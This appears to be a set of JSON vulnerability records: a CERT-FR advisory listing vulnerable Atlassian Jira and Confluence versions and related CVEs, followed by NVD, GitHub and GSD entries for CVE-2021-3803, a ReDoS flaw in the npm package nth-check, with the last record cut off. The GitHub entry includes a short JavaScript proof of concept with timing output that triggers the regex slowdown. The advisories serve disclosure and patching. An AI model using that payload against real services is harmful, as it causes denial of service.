{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Jira Service Management Data Center et Server versions 11.3.x ant\u00e9rieures \u00e0 11.3.7",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Confluence Data Center versions 10.2.x ant\u00e9rieures \u00e0 10.2.13",
      "product": {
        "name": "Confluence",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Software Data Center versions 10.3.x ant\u00e9rieures \u00e0 10.3.22",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Service Management Data Center et Server versions 10.3.x ant\u00e9rieures \u00e0 10.3.22",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Confluence Data Center versions 9.2.x ant\u00e9rieures \u00e0 9.2.21",
      "product": {
        "name": "Confluence",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Service Management Data Center versions 10.3.x ant\u00e9rieures \u00e0 10.3.22",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Software Data Center versions 11.3.x ant\u00e9rieures \u00e0 11.3.7",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Software Data Center et Server versions 10.3.x ant\u00e9rieures \u00e0 10.3.22",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Service Management Data Center versions 11.3.x ant\u00e9rieures \u00e0 11.3.7",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Software Data Center et Server versions 9.12.x ant\u00e9rieures \u00e0 9.12.36",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Software Data Center et Server versions 11.3.x ant\u00e9rieures \u00e0 11.3.7",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    },
    {
      "description": "Jira Software Data Center versions 9.12.x ant\u00e9rieures \u00e0 9.12.36",
      "product": {
        "name": "Jira",
        "vendor": {
          "name": "Atlassian",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
  "cves": [
    {
      "name": "CVE-2026-33871",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-33871"
    },
    {
      "name": "CVE-2026-43515",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-43515"
    },
    {
      "name": "CVE-2026-42211",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-42211"
    },
    {
      "name": "CVE-2026-34486",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-34486"
    },
    {
      "name": "CVE-2026-33870",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-33870"
    },
    {
      "name": "CVE-2026-42585",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-42585"
    },
    {
      "name": "CVE-2026-42584",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-42584"
    },
    {
      "name": "CVE-2026-41284",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-41284"
    },
    {
      "name": "CVE-2026-45149",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-45149"
    },
    {
      "name": "CVE-2026-42033",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-42033"
    },
    {
      "name": "CVE-2026-42035",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-42035"
    },
    {
      "name": "CVE-2026-44495",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-44495"
    },
    {
      "name": "CVE-2026-42043",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-42043"
    },
    {
      "name": "CVE-2026-40175",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-40175"
    },
    {
      "name": "CVE-2026-27903",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-27903"
    },
    {
      "name": "CVE-2026-34487",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-34487"
    },
    {
      "name": "CVE-2021-3803",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-3803"
    },
    {
      "name": "CVE-2026-42038",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-42038"
    },
    {
      "name": "CVE-2026-42583",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-42583"
    },
    {
      "name": "CVE-2026-43513",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-43513"
    },
    {
      "name": "CVE-2026-29129",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-29129"
    },
    {
      "name": "CVE-2026-42587",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-42587"
    },
    {
      "name": "CVE-2026-42342",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-42342"
    },
    {
      "name": "CVE-2026-26996",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-26996"
    },
    {
      "name": "CVE-2026-42264",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-42264"
    },
    {
      "name": "CVE-2026-45736",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-45736"
    },
    {
      "name": "CVE-2026-43512",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-43512"
    },
    {
      "name": "CVE-2026-42579",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-42579"
    },
    {
      "name": "CVE-2026-42498",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-42498"
    },
    {
      "name": "CVE-2026-27904",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-27904"
    },
    {
      "name": "CVE-2026-34077",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-34077"
    },
    {
      "name": "CVE-2026-41293",
      "url": "https://www.cve.org/CVERecord?id=CVE-2026-41293"
    }
  ],
  "initial_release_date": "2026-06-18T00:00:00",
  "last_revision_date": "2026-06-18T00:00:00",
  "links": [],
  "reference": "CERTFR-2026-AVI-0773",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2026-06-18T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "D\u00e9ni de service \u00e0 distance"
    },
    {
      "description": "Injection de code indirecte \u00e0 distance (XSS)"
    },
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
    },
    {
      "description": "Contournement de la politique de s\u00e9curit\u00e9"
    },
    {
      "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits Atlassian. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Atlassian",
  "vendor_advisories": [
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26825",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26825"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16543",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16543"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16622",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16622"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16604",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16604"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26820",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26820"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26813",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26813"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16583",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16583"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16609",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16609"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16613",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16613"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-104143",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-104143"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-104139",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-104139"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16626",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16626"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16614",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16614"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26791",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26791"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-104136",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-104136"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26783",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26783"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-103936",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-103936"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26805",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26805"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26800",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26800"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26838",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26838"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16618",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16618"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26815",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26815"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26819",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26819"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-104131",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-104131"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-104199",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-104199"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-103906",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-103906"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26751",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26751"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16620",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16620"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16615",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16615"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16632",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16632"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16627",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16627"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-103468",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-103468"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26841",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26841"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26818",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26818"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26837",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26837"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-104132",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-104132"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16608",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16608"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26835",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26835"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-104134",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-104134"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16616",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16616"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16610",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16610"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16617",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16617"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26821",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26821"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26784",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26784"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16623",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16623"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-104133",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-104133"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26840",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26840"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-104130",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-104130"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16629",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16629"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26752",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26752"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26827",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26827"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16606",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16606"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16628",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16628"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26816",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26816"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-104135",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-104135"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26811",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26811"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26826",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26826"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16541",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16541"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-104138",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-104138"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26822",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26822"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16607",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16607"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16631",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16631"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16625",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16625"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian CONFSERVER-104171",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-104171"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16621",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16621"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16584",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16584"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26814",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26814"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSDSERVER-16611",
      "url": "https://jira.atlassian.com/browse/JSDSERVER-16611"
    },
    {
      "published_at": "2026-06-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Atlassian JSWSERVER-26836",
      "url": "https://jira.atlassian.com/browse/JSWSERVER-26836"
    }
  ]
}

{
  "affected": [
    {
      "affectedData": [
        {
          "product": "fb55/nth-check",
          "vendor": "fb55",
          "versions": [
            {
              "lessThan": "2.0.1",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "source": "security@huntr.dev"
    }
  ],
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:nth-check_project:nth-check:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F668383F-6A77-4A7E-AA95-0970943465A6",
              "versionEndExcluding": "2.0.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "nth-check is vulnerable to Inefficient Regular Expression Complexity"
    },
    {
      "lang": "es",
      "value": "nth-check es vulnerable a una Complejidad de Expresiones Regulares Ineficientes"
    }
  ],
  "id": "CVE-2021-3803",
  "lastModified": "2026-06-17T04:05:47.910",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security@huntr.dev",
        "type": "Secondary"
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-09-17T07:15:09.153",
  "references": [
    {
      "source": "security@huntr.dev",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://github.com/fb55/nth-check/commit/9894c1d2010870c351f66c6f6efcf656e26bb726"
    },
    {
      "source": "security@huntr.dev",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://huntr.dev/bounties/8cf8cc06-d2cf-4b4e-b42c-99fafb0b04d0"
    },
    {
      "source": "security@huntr.dev",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00023.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://github.com/fb55/nth-check/commit/9894c1d2010870c351f66c6f6efcf656e26bb726"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://huntr.dev/bounties/8cf8cc06-d2cf-4b4e-b42c-99fafb0b04d0"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00023.html"
    }
  ],
  "sourceIdentifier": "security@huntr.dev",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-1333"
        }
      ],
      "source": "security@huntr.dev",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-1333"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "nth-check"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-3803"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-09-20T20:15:09Z",
    "nvd_published_at": "2021-09-17T07:15:00Z",
    "severity": "HIGH"
  },
  "details": "There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.\n\nThe ReDoS vulnerabilities of the regex are mainly due to the sub-pattern `\\s*(?:([+-]?)\\s*(\\d+))?` with quantified overlapping adjacency and can be exploited with the following code.\n\n**Proof of Concept**\n```js\n// PoC.js\nvar nthCheck = require(\"nth-check\")\nfor(var i = 1; i \u003c= 50000; i++) {\n    var time = Date.now();\n    var attack_str = \u00272n\u0027 + \u0027 \u0027.repeat(i*10000)+\"!\";\n    try {\n        nthCheck.parse(attack_str) \n    }\n    catch(err) {\n        var time_cost = Date.now() - time;\n        console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\")\n    }\n}\n```\n\n**The Output**\n```\nattack_str.length: 10003: 174 ms\nattack_str.length: 20003: 1427 ms\nattack_str.length: 30003: 2602 ms\nattack_str.length: 40003: 4378 ms\nattack_str.length: 50003: 7473 ms\n```",
  "id": "GHSA-rp65-9cf3-cjxr",
  "modified": "2023-09-13T21:49:54Z",
  "published": "2021-09-20T20:47:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3803"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fb55/nth-check/commit/9894c1d2010870c351f66c6f6efcf656e26bb726"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fb55/nth-check"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/8cf8cc06-d2cf-4b4e-b42c-99fafb0b04d0"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00023.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Inefficient Regular Expression Complexity in nth-check"
}

{
  "GSD": {
    "alias": "CVE-2021-3803",
    "description": "nth-check is vulnerable to Inefficient Regular Expression Complexity",
    "id": "GSD-2021-3803"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2021-3803"
      ],
      "details": "nth-check is vulnerable to Inefficient Regular Expression Complexity",
      "id": "GSD-2021-3803",
      "modified": "2023-12-13T01:23:34.070715Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security@huntr.dev",
        "ID": "CVE-2021-3803",
        "STATE": "PUBLIC",
        "TITLE": "Inefficient Regular Expression Complexity in fb55/nth-check"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "fb55/nth-check",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "\u003c",
                          "version_value": "2.0.1"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "fb55"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "nth-check is vulnerable to Inefficient Regular Expression Complexity"
          }
        ]
      },
      "impact": {
        "cvss": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
